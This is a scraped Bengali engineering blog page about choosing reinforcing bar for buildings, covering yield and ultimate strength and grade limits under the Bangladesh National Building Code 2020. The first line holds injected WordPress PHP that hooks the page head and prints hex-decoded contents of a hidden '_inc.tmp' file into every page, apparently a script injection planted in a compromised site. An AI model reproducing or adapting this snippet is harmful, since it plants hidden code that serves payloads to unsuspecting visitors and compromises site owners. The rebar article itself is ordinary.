if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } বিল্ডিংয়ে কি রড ব্যবহার করবেন? – Jaher Design & Consultancy (JDC)

বিল্ডিংয়ে কি রড ব্যবহার করবেন?

বিল্ডিং ডিজাইন করার পর কনস্ট্রাকশন শুরু হলে অনেক ভবন মালিক জানতে চান যে কি ধরনের রড ব্যবহার করবো। যদিও স্পেসিফিকেশন স্ট্রাকচারাল ড্রয়িং এর “জেনারেল নোটস” এ দেয়া থাকে, কিন্তু অনেক সময় সেটা হয়ত তারা ভূলবশত ওভারলুক করে যান।

রিইনফোর্স কনক্রীটের তৈরী বিল্ডিংয়ের মূল দুটি উপাদানের একটি হচ্ছে কনক্রীট যা সিমেন্ট, বালু , পাথর বা পাথরকূচি ও পানি এর মিশ্রণ থেকে তৈরী এবং অপরটি এম এস রড।

ভূমিকম্প সহনীয় ডিজাইনে সবচেয়ে কার্যকর ভূমিকা রাখে রডের ডাক্টিলিটি। যেটা রডের কিছু গুনের উপর নির্ভর করে। রড ব্যবহারের পূর্বে রডের এই গুনগুলো জানা জরুরী যেমন, ইল্ড স্ট্রেংথ (fy), আল্টিমেট স্ট্রেংথ (fu), ইলংগেশন, বেন্ড, ডিফর্মেশন ইত্যাদি। আজকে এই প্রথম দুটি প্রপার্টি নিয়ে লিখবো। বাকীগুলো নিয়ে ইনশাল্লাহ আরেকদিন লিখবো। আমরা রডের গ্রেড যেটা বলি তা হচ্ছে ইল্ড স্ট্রেংথ (fy)। যেমন ৬০ গ্রেড রডের ইল্ড স্ট্রেংথ (fy) কমপক্ষে ৪২০ মেগাপ্যাসকেল হতে হবে।

প্রকৌশলের ভাষায়, সর্বোচ্চ যেই স্ট্রেস পর্যন্ত রডের স্ট্রেইন একই অনুপাতে বাড়তে থাকে সেটাই ইল্ড স্ট্রেংথ (fy)।

সর্বোচ্চ যেই স্ট্রেস রড ছিঁড়ে যাবার পূর্বে নিতে পারে সেটা হল রডের আল্টিমেট স্ট্রেংথ (fu)।

আপনার বিল্ডিং ভূমিকম্প সহনীয় হচ্ছে কিনা তা বুঝার জন্য রডের এই প্রপার্টিগুলো খুব দরকারী। ইল্ড স্ট্রেংথ এর মান (fy) রডের গ্রেড এর চেয়ে বেশী হতে হবে। টেস্টের পর এই মান সর্বোচ্চ ১২৫ মেগাপ্যাসকেল পর্যন্ত বেশী হতে পারে।

অর্থাৎ, টেস্টিং এ ৬০ গ্রেড রড এর ইল্ড স্ট্রেংথ (fy) ৪২০ মেগাপাসকেল এর বেশী এবং ৪২০+১২৫= ৫৪৫ মেগাপ্যাসকেল এর কম হতে হবে।

আল্টিমেট স্ট্রেংথ (fu) অবশ্যই ইল্ড স্ট্রেংথ এর (fy) চেয়ে কমপক্ষে ২৫% বেশী হতে হবে।

বাংলাদেশ জাতীয় বিল্ডিং কোড ২০২০ অনুযায়ী, নির্মাণ এলাকার ভুমিকম্প প্রবণতা, বিল্ডিং এর অকুপ্যান্সী ক্যাটাগরী ও বিল্ডিংয়ের নিচের মাটির বৈশিষ্টের উপর ভিত্তি করে স্ট্রাকচার কে সাইসমিক ডিজাইন ক্যাটাগরী বি, সি ও ডি তে ভাগ করা হয়েছে। সাইসমিক ডিজাইন ক্যাটাগরী ডি মানে সর্বাধিক ঝুঁকিপূর্ন ভবন যাতে ভূমিকম্প সহনীয়তার জন্য পর্যাপ্ত স্পেশাল ডিটেইলিং লাগবে। এই বিল্ডিং গুলোতে ৬০ গ্রেডের বেশী গ্রেডের রড ব্যবহার করা যাবেনা। বি ও সি ক্যাটাগরীতে অন্য উচ্চ গ্রেড গুলো ব্যবহার করা যাবে।

যেকোন স্থাপনা নির্মাণের আগে একজন দক্ষ কাঠামো প্রকৌশলী/ স্ট্রাকচারাল ইঞ্জিনিয়ারের তত্ত্বাবধানে ভালো কোন ল্যাব থেকে রডের টেস্ট করে যথাযথ গুনাগুন নিশ্চিত হয়ে নিতে হবে। নয়তো বাড়ি নির্মাণের মতো বিশাল ইনভেস্টমেন্টের বড় অংশই সঠিকভাবে কাজে লাগবেনা।

তথ্যসূত্রঃ
1. Building Code Requirements for Structural Concrete ,ACI 318-11 by American Concrete Institute
2. Bangladesh National Building Code, BNBC 2020
3. Bangladesh Standards, BDS ISO 6935-2-2016



Leave a Reply